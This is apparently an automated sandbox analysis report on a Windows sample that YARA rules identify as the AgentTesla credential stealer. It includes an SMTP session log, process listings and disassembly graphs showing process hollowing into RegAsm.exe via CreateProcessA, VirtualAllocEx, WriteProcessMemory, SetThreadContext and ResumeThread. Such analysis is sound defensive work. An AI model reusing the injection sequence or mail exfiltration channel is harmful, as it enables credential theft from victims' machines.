                              Data Ascii: oBRY+nJpIrQzO7IA9Z4yIZpGNoINP6emJKLgtBPY4MSFK0Ei92ZYHgKvf+ew/mwAUQ+1yXISWoZglCckortxTsbpBl3dOhiphby3GFmyJgyJTookf+coFAIWbNHZUfqL1Fntkv7RLxkUIPmTIWl/xW03o7bonSPqYT601Z/TujrL35fsWG85NXrY1YHA3hWedJYCUzcgVvgv+PYKMzYbAoTLkFn24bYuPFyJTowQcQY6EX85dQuTT3WwroB2tzc


                              SMTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              Sep 26, 2024 09:18:57.440876961 CEST5874973378.110.166.82192.168.2.4220-cphost14.qhoster.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 08:18:57 +0100
                              220-We do not authorize the use of this system to transport unsolicited,
                              220 and/or bulk e-mail.
                              Sep 26, 2024 09:18:57.441437960 CEST49733587192.168.2.478.110.166.82EHLO 562258
                              Sep 26, 2024 09:18:57.607733011 CEST5874973378.110.166.82192.168.2.4250-cphost14.qhoster.net Hello 562258 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-STARTTLS
                              250 HELP
                              Sep 26, 2024 09:18:57.608017921 CEST49733587192.168.2.478.110.166.82STARTTLS
                              Sep 26, 2024 09:18:58.035113096 CEST5874973378.110.166.82192.168.2.4220 TLS go ahead
                              Sep 26, 2024 09:18:58.036175013 CEST5874973378.110.166.82192.168.2.4220 TLS go ahead

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:18:52
                              Start date:26/09/2024
                              Path:C:\Users\user\Desktop\450230549.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\450230549.exe"
                              Imagebase:0x3d0000
                              File size:107'848 bytes
                              MD5 hash:5086980F3EE0C035EC304102E6981410
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x200000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0xe0000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:03:18:54
                              Start date:26/09/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x530000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:31.8%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:19.6%
                                Total number of Nodes:102
                                Total number of Limit Nodes:4
                                execution_graph 2618 d33c51 2619 d33ca3 ReadProcessMemory 2618->2619 2620 d33ce6 2619->2620 2634 d322e1 2635 d32243 2634->2635 2636 d322e4 2634->2636 2635->2634 2635->2636 2637 d33f01 ResumeThread 2635->2637 2638 d33f2e 2637->2638 2631 d33d20 2632 d33d6b VirtualAllocEx 2631->2632 2633 d33da2 2632->2633 2639 d33eb9 2640 d33f01 ResumeThread 2639->2640 2641 d33f2e 2640->2641 2655 d33b89 2656 d33bd8 Wow64SetThreadContext 2655->2656 2658 d33c16 2656->2658 2541 d30a28 2542 d30a42 2541->2542 2545 d30fa0 2542->2545 2546 d30fd7 2545->2546 2552 d32b17 2546->2552 2562 d32b28 2546->2562 2572 d32b19 2546->2572 2582 d335a6 2546->2582 2547 d30ab2 2561 d32b91 2552->2561 2553 d335fa 2553->2547 2558 d32234 WriteProcessMemory 2558->2561 2561->2553 2561->2558 2592 d321ec 2561->2592 2598 d321f8 2561->2598 2602 d32210 2561->2602 2606 d32228 2561->2606 2610 d32240 2561->2610 2614 d32258 2561->2614 2571 d32b5b 2562->2571 2563 d335fa 2563->2547 2564 d321ec 2 API calls 2564->2571 2565 d321f8 Wow64SetThreadContext 2565->2571 2566 d32210 ReadProcessMemory 2566->2571 2567 d32228 VirtualAllocEx 2567->2571 2568 d32234 WriteProcessMemory 2568->2571 2569 d32240 Wow64SetThreadContext 2569->2571 2570 d32258 ResumeThread 2570->2571 2571->2563 2571->2564 2571->2565 2571->2566 2571->2567 2571->2568 2571->2569 2571->2570 2579 d32b5b 2572->2579 2573 d335fa 2573->2547 2574 d321ec 2 API calls 2574->2579 2575 d321f8 Wow64SetThreadContext 2575->2579 2576 d32210 ReadProcessMemory 2576->2579 2577 d32228 VirtualAllocEx 2577->2579 2578 d32234 WriteProcessMemory 2578->2579 2579->2573 2579->2574 2579->2575 2579->2576 2579->2577 2579->2578 2580 d32240 Wow64SetThreadContext 2579->2580 2581 d32258 ResumeThread 2579->2581 2580->2579 2581->2579 2591 d32c06 2582->2591 2583 d335fa 2583->2547 2584 d321ec 2 API calls 2584->2591 2585 d321f8 Wow64SetThreadContext 2585->2591 2586 d32210 ReadProcessMemory 2586->2591 2587 d32228 VirtualAllocEx 2587->2591 2588 d32234 WriteProcessMemory 2588->2591 2589 d32240 Wow64SetThreadContext 2589->2591 2590 d32258 ResumeThread 2590->2591 2591->2583 2591->2584 2591->2585 2591->2586 2591->2587 2591->2588 2591->2589 2591->2590 2593 d33798 CreateProcessA 2592->2593 2595 d339e2 2593->2595 2596 d33e41 WriteProcessMemory 2595->2596 2597 d33e7c 2596->2597 2597->2561 2599 d33b90 Wow64SetThreadContext 2598->2599 2601 d33c16 2599->2601 2601->2561 2603 d33c58 ReadProcessMemory 2602->2603 2605 d33ce6 2603->2605 2605->2561 2607 d33d28 VirtualAllocEx 2606->2607 2609 d33da2 2607->2609 2609->2561 2611 d33b90 Wow64SetThreadContext 2610->2611 2613 d33c16 2611->2613 2613->2561 2615 d3225f ResumeThread 2614->2615 2617 d33f2e 2615->2617 2617->2561 2621 d33dd8 2622 d33e2b WriteProcessMemory 2621->2622 2624 d33e7c 2622->2624 2642 d33a58 2643 d33a60 2642->2643 2644 d33e41 WriteProcessMemory 2643->2644 2645 d33e7c 2644->2645 2646 d32278 2647 d32243 2646->2647 2647->2646 2648 d33f01 ResumeThread 2647->2648 2650 d322e4 2647->2650 2649 d33f2e 2648->2649 2651 d30a18 2652 d30a42 2651->2652 2654 d30fa0 8 API calls 2652->2654 2653 d30ab2 2654->2653 2625 d321cf 2628 d321d6 CreateProcessA 2625->2628 2630 d32234 2625->2630 2626 d33e41 WriteProcessMemory 2627 d33e7c 2626->2627 2628->2630 2630->2626 2659 d3378d 2660 d33824 CreateProcessA 2659->2660 2662 d339e2 2660->2662 2663 d33e41 WriteProcessMemory 2662->2663 2664 d33e7c 2663->2664

                                Executed Functions

                                Function 00D32B28 Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 102 d32b28-d32b59 103 d32b60-d32bd9 102->103 104 d32b5b 102->104 106 d32bf4-d32bf8 103->106 104->103 107 d32bdb-d32bed 106->107 108 d32bfa-d32c01 106->108 107->106 109 d32bef 107->109 110 d335dd-d335f4 108->110 109->106 111 d32c06-d32d67 call d321ec 110->111 112 d335fa-d33601 110->112 124 d32dab-d32e17 111->124 125 d32d69-d32da0 111->125 132 d32e19 124->132 133 d32e1e-d32e44 124->133 125->124 132->133 135 d32e4a-d32e5a call d321f8 133->135 136 d32ef9-d32f03 133->136 140 d32e5f-d32e6c 135->140 138 d32f05 136->138 139 d32f0a-d32f5c call d32210 136->139 138->139 147 d32fa0-d32fb9 139->147 148 d32f5e-d32f95 139->148 142 d32e9e-d32ea0 140->142 143 d32e6e-d32e9c call d32204 140->143 146 d32ea6-d32eb4 142->146 143->146 150 d32eb6-d32eed 146->150 151 d32ef8 146->151 152 d33032-d330c1 call d32228 147->152 153 d32fbb-d32fed call d3221c 147->153 148->147 150->151 151->136 169 d330c3-d330fa 152->169 170 d33105-d3314f call d32234 152->170 159 d33031 153->159 160 d32fef-d33026 153->160 159->152 160->159 169->170 176 d33193-d331c8 170->176 177 d33151-d33188 170->177 182 d33346-d33362 176->182 177->176 184 d33368-d333ce call d32234 182->184 185 d331cd-d33254 182->185 192 d33412-d33443 184->192 193 d333d0-d33407 184->193 197 d3333b-d33340 185->197 198 d3325a-d332d1 call d32234 185->198 199 d33445 192->199 200 d3344a-d33475 192->200 193->192 197->182 211 d332d6-d332f6 198->211 199->200 205 d33530-d33539 call d32258 200->205 206 d3347b-d3348b call d32240 200->206 213 d3353e-d3355e 205->213 212 d33490-d3349d 206->212 214 d3333a 211->214 215 d332f8-d3332f 211->215 216 d334cf-d334d1 212->216 217 d3349f-d334cd call d3224c 212->217 218 d335a2-d335d8 213->218 219 d33560-d33597 213->219 214->197 215->214 222 d334d7-d334eb 216->222 217->222 218->110 218->112 219->218 226 d3352f 222->226 227 d334ed-d33524 222->227 226->205 227->226
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: (
                                • API String ID: 3559483778-3887548279
                                • Opcode ID: 6a63a667dfaf60efe127d508f1231213a1baff22a9537cf4895109cc2fb8f785
                                • Instruction ID: 332c529531de45b6776ae4e4d0cd582688edfa441309926a598de30d99228903
                                • Opcode Fuzzy Hash: 6a63a667dfaf60efe127d508f1231213a1baff22a9537cf4895109cc2fb8f785
                                • Instruction Fuzzy Hash: 5452DF74E002688FDB64DF69C944BDDBBB2BF89300F1481EAD509AB255DB349E85CF50
                                Function 00D311D8 Relevance: .3, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9fb38cae54ae78166822e87383ae350424588079789166f0f6aaf150d7e5b92
                                • Instruction ID: 25595a1108c0eead0590d86d1e096c962f0739ef4804b315d8bf0f125186572e
                                • Opcode Fuzzy Hash: f9fb38cae54ae78166822e87383ae350424588079789166f0f6aaf150d7e5b92
                                • Instruction Fuzzy Hash: 5CD1C378E0120ACFCB14CFA9D584ADDBBB5FF89314F189269E405AB365D730A986CF50
                                Function 00D321CF Relevance: 3.3, APIs: 2, Instructions: 326processinjectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 d321cf-d321d4 1 d321d6-d33830 0->1 2 d32234-d3223b 0->2 15 d33832-d3383c 1->15 16 d33869-d33889 1->16 3 d33de0-d33e31 2->3 6 d33e33-d33e3f 3->6 7 d33e41-d33e7a WriteProcessMemory 3->7 6->7 9 d33e83-d33eab 7->9 10 d33e7c-d33e82 7->10 10->9 15->16 17 d3383e-d33840 15->17 23 d338c2-d338f1 16->23 24 d3388b-d33895 16->24 18 d33863-d33866 17->18 19 d33842-d3384c 17->19 18->16 21 d33850-d3385f 19->21 22 d3384e 19->22 21->21 26 d33861 21->26 22->21 32 d338f3-d338fd 23->32 33 d3392a-d339e0 CreateProcessA 23->33 24->23 25 d33897-d33899 24->25 27 d3389b-d338a5 25->27 28 d338bc-d338bf 25->28 26->18 30 d338a7 27->30 31 d338a9-d338b8 27->31 28->23 30->31 31->31 34 d338ba 31->34 32->33 35 d338ff-d33901 32->35 43 d339e2-d339e8 33->43 44 d339e9-d33a64 33->44 34->28 37 d33903-d3390d 35->37 38 d33924-d33927 35->38 39 d33911-d33920 37->39 40 d3390f 37->40 38->33 39->39 42 d33922 39->42 40->39 42->38 43->44 53 d33a66-d33a6a 44->53 54 d33a74-d33a78 44->54 53->54 55 d33a6c-d33a6f call d30bc0 53->55 56 d33a7a-d33a7e 54->56 57 d33a88-d33a8c 54->57 55->54 56->57 59 d33a80-d33a83 call d30bc0 56->59 60 d33a8e-d33a92 57->60 61 d33a9c-d33aa0 57->61 59->57 60->61 65 d33a94-d33a97 call d30bc0 60->65 62 d33ab2-d33ab9 61->62 63 d33aa2-d33aa8 61->63 67 d33ad0 62->67 68 d33abb-d33aca 62->68 63->62 65->61 67->3 68->67
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: Process$CreateMemoryWrite
                                • String ID:
                                • API String ID: 575940244-0
                                • Opcode ID: bdc6e95bfeb152da5d95f10f40e21841277416b917cd31902e9570d05adf9781
                                • Instruction ID: 1fdcae0225fddfe67507a6033d527229615315416e1be076fd118aa7b818aaa9
                                • Opcode Fuzzy Hash: bdc6e95bfeb152da5d95f10f40e21841277416b917cd31902e9570d05adf9781
                                • Instruction Fuzzy Hash: B9D18971D00259DFDB10CFA9C941BEEBBF5EF48310F1485AAE848A7290D7749A85CFA1
                                Function 00D322E1 Relevance: 1.8, APIs: 1, Instructions: 292COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 235 d322e1-d322e2 236 d322e4 235->236 237 d322bc-d322ca 235->237 240 d322e6-d322f8 236->240 241 d32344-d324b9 236->241 238 d322b5-d322b8 237->238 239 d322cc-d322cf 237->239 242 d32243-d3224a 238->242 243 d322b9-d322bb 238->243 244 d322d1-d322d4 239->244 245 d32289-d3229a 239->245 240->241 246 d324bf 241->246 248 d3225f-d33f2c ResumeThread 242->248 243->237 247 d322d6-d322d7 244->247 244->248 249 d32274-d32287 245->249 250 d3229c 245->250 247->235 258 d33f35-d33f52 248->258 259 d33f2e-d33f34 248->259 249->245 253 d3229e-d322b3 250->253 254 d322fc-d324b9 250->254 253->238 254->246 259->258
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 197fc4b0fad993f7c198c31852a9c1f5f80bc86683daddcceb297248ee3dba36
                                • Instruction ID: a5fb1a682742847d859069e5667e8be831113add2a5795896586c273c2226ec3
                                • Opcode Fuzzy Hash: 197fc4b0fad993f7c198c31852a9c1f5f80bc86683daddcceb297248ee3dba36
                                • Instruction Fuzzy Hash: 3041B675C0D3858FC702CBA888512AABFF0AF56320F2544DBD185DB263D234590ACBB5
                                Function 00D3378D Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 262 d3378d-d33830 264 d33832-d3383c 262->264 265 d33869-d33889 262->265 264->265 266 d3383e-d33840 264->266 272 d338c2-d338f1 265->272 273 d3388b-d33895 265->273 267 d33863-d33866 266->267 268 d33842-d3384c 266->268 267->265 270 d33850-d3385f 268->270 271 d3384e 268->271 270->270 275 d33861 270->275 271->270 281 d338f3-d338fd 272->281 282 d3392a-d339e0 CreateProcessA 272->282 273->272 274 d33897-d33899 273->274 276 d3389b-d338a5 274->276 277 d338bc-d338bf 274->277 275->267 279 d338a7 276->279 280 d338a9-d338b8 276->280 277->272 279->280 280->280 283 d338ba 280->283 281->282 284 d338ff-d33901 281->284 292 d339e2-d339e8 282->292 293 d339e9-d33a64 282->293 283->277 286 d33903-d3390d 284->286 287 d33924-d33927 284->287 288 d33911-d33920 286->288 289 d3390f 286->289 287->282 288->288 291 d33922 288->291 289->288 291->287 292->293 302 d33a66-d33a6a 293->302 303 d33a74-d33a78 293->303 302->303 304 d33a6c-d33a6f call d30bc0 302->304 305 d33a7a-d33a7e 303->305 306 d33a88-d33a8c 303->306 304->303 305->306 308 d33a80-d33a83 call d30bc0 305->308 309 d33a8e-d33a92 306->309 310 d33a9c-d33aa0 306->310 308->306 309->310 314 d33a94-d33a97 call d30bc0 309->314 311 d33ab2-d33ab9 310->311 312 d33aa2-d33aa8 310->312 316 d33ad0-d33e31 311->316 317 d33abb-d33aca 311->317 312->311 314->310 321 d33e33-d33e3f 316->321 322 d33e41-d33e7a WriteProcessMemory 316->322 317->316 321->322 323 d33e83-d33eab 322->323 324 d33e7c-d33e82 322->324 324->323
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: b8fa98d798b084c9f358c39900284a8f7d19c7fc8db64052c4949cc6b54ec2e1
                                • Instruction ID: 1ced5879b5dbb1c82d2ce914220e4869f3dc011d45f841167d8c4b1b4e04450d
                                • Opcode Fuzzy Hash: b8fa98d798b084c9f358c39900284a8f7d19c7fc8db64052c4949cc6b54ec2e1
                                • Instruction Fuzzy Hash: 5BA17D71D00659DFDF10CFA8C9417DDBBF2AF48304F1885AAE849A7290D7749A85CFA2
                                Function 00D321EC Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 327 d321ec-d33830 330 d33832-d3383c 327->330 331 d33869-d33889 327->331 330->331 332 d3383e-d33840 330->332 338 d338c2-d338f1 331->338 339 d3388b-d33895 331->339 333 d33863-d33866 332->333 334 d33842-d3384c 332->334 333->331 336 d33850-d3385f 334->336 337 d3384e 334->337 336->336 341 d33861 336->341 337->336 347 d338f3-d338fd 338->347 348 d3392a-d339e0 CreateProcessA 338->348 339->338 340 d33897-d33899 339->340 342 d3389b-d338a5 340->342 343 d338bc-d338bf 340->343 341->333 345 d338a7 342->345 346 d338a9-d338b8 342->346 343->338 345->346 346->346 349 d338ba 346->349 347->348 350 d338ff-d33901 347->350 358 d339e2-d339e8 348->358 359 d339e9-d33a64 348->359 349->343 352 d33903-d3390d 350->352 353 d33924-d33927 350->353 354 d33911-d33920 352->354 355 d3390f 352->355 353->348 354->354 357 d33922 354->357 355->354 357->353 358->359 368 d33a66-d33a6a 359->368 369 d33a74-d33a78 359->369 368->369 370 d33a6c-d33a6f call d30bc0 368->370 371 d33a7a-d33a7e 369->371 372 d33a88-d33a8c 369->372 370->369 371->372 374 d33a80-d33a83 call d30bc0 371->374 375 d33a8e-d33a92 372->375 376 d33a9c-d33aa0 372->376 374->372 375->376 380 d33a94-d33a97 call d30bc0 375->380 377 d33ab2-d33ab9 376->377 378 d33aa2-d33aa8 376->378 382 d33ad0-d33e31 377->382 383 d33abb-d33aca 377->383 378->377 380->376 387 d33e33-d33e3f 382->387 388 d33e41-d33e7a WriteProcessMemory 382->388 383->382 387->388 389 d33e83-d33eab 388->389 390 d33e7c-d33e82 388->390 390->389
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00D339CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c915f4d22f6e1691f162e2cba404ff181c6676a2caf5e1918c34a4b10a912f57
                                • Instruction ID: 32149a444f14f2794b81416b324f5e17108741815ad0f07718b795e4c795b7fe
                                • Opcode Fuzzy Hash: c915f4d22f6e1691f162e2cba404ff181c6676a2caf5e1918c34a4b10a912f57
                                • Instruction Fuzzy Hash: C0916C71D00659DFDF10CFA9C9417DDBBF2AF48300F1485AAE849A7290DB749A85CFA2
                                Function 00D33DD8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 425 d33dd8-d33e31 427 d33e33-d33e3f 425->427 428 d33e41-d33e7a WriteProcessMemory 425->428 427->428 429 d33e83-d33eab 428->429 430 d33e7c-d33e82 428->430 430->429
                                APIs
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 713c91f9e7b0e5b72556d46e9f2a1480738940475e7cae5028be012968fccd26
                                • Instruction ID: 1736a4ce7f98598b46f21f9474c4ebd6a9adb1dbc49d791687c5a04aac3f3345
                                • Opcode Fuzzy Hash: 713c91f9e7b0e5b72556d46e9f2a1480738940475e7cae5028be012968fccd26
                                • Instruction Fuzzy Hash: 9A2115B59002499FCB10CFA9C985BDEBFF4FB48310F14852EE458A7251D374A954CB64
                                Function 00D32234 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 433 d32234-d33e31 436 d33e33-d33e3f 433->436 437 d33e41-d33e7a WriteProcessMemory 433->437 436->437 438 d33e83-d33eab 437->438 439 d33e7c-d33e82 437->439 439->438
                                APIs
                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00D33E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: f697e3078d24b4bb77610686d64528bc6afc19a6142be6fcd533c041d009b6c6
                                • Instruction ID: 14b198bf958c007aec881468900f3d617dfa46b241414bf56423786586e7f77b
                                • Opcode Fuzzy Hash: f697e3078d24b4bb77610686d64528bc6afc19a6142be6fcd533c041d009b6c6
                                • Instruction Fuzzy Hash: C42122B5900249DFCB10CF9AC985BDEBBF4FB48310F10852AE918A7350D378AA40CBA4
                                Function 00D32210 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 442 d32210-d33ce4 ReadProcessMemory 445 d33ce6-d33cec 442->445 446 d33ced-d33d15 442->446 445->446
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00D33CD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4ee9ab24393ee4a1b9296e83d4c2bdbe9a4a3c158433b845a462681f77344ef6
                                • Instruction ID: dcf2409e25e6eeeabf71fdf719b95e6275e2d84ff51c6f0ea835ccbd7277e861
                                • Opcode Fuzzy Hash: 4ee9ab24393ee4a1b9296e83d4c2bdbe9a4a3c158433b845a462681f77344ef6
                                • Instruction Fuzzy Hash: 2821E2B5900359DFCB10CF9AD984ADEBBF4FB48320F10842AE958A7251D375AA44CBA4
                                Function 00D321F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 449 d321f8-d33bdc 452 d33be8-d33c14 Wow64SetThreadContext 449->452 453 d33bde-d33be6 449->453 454 d33c16-d33c1c 452->454 455 d33c1d-d33c45 452->455 453->452 454->455
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 9e106a14b3245c9bd983a75ea1624739dc263965e234b97359e5f13a144546b5
                                • Instruction ID: 737d6fd9184241be388fa687e314161096d5deeacd3327c54176a04e1a986b2d
                                • Opcode Fuzzy Hash: 9e106a14b3245c9bd983a75ea1624739dc263965e234b97359e5f13a144546b5
                                • Instruction Fuzzy Hash: EF2113B1D006599FCB10CF9AC545BAEFBF4AB08720F14812AE818B7341D378A944CFA5
                                Function 00D32240 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 458 d32240-d33bdc 461 d33be8-d33c14 Wow64SetThreadContext 458->461 462 d33bde-d33be6 458->462 463 d33c16-d33c1c 461->463 464 d33c1d-d33c45 461->464 462->461 463->464
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: e380d1fc1a8dacf51cf1facd38927509aafbb5e56fcbfddbc022c1e3ebf4c6ac
                                • Instruction ID: f3998ee71d534da677cc84c52d0aec64af013d04fead1a5980f838febebdbf0d
                                • Opcode Fuzzy Hash: e380d1fc1a8dacf51cf1facd38927509aafbb5e56fcbfddbc022c1e3ebf4c6ac
                                • Instruction Fuzzy Hash: A62113B1D006599BCB10CF9AC545BAEFBF4AB08720F14816AE818B7341D378A944CFA5
                                Function 00D33B89 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
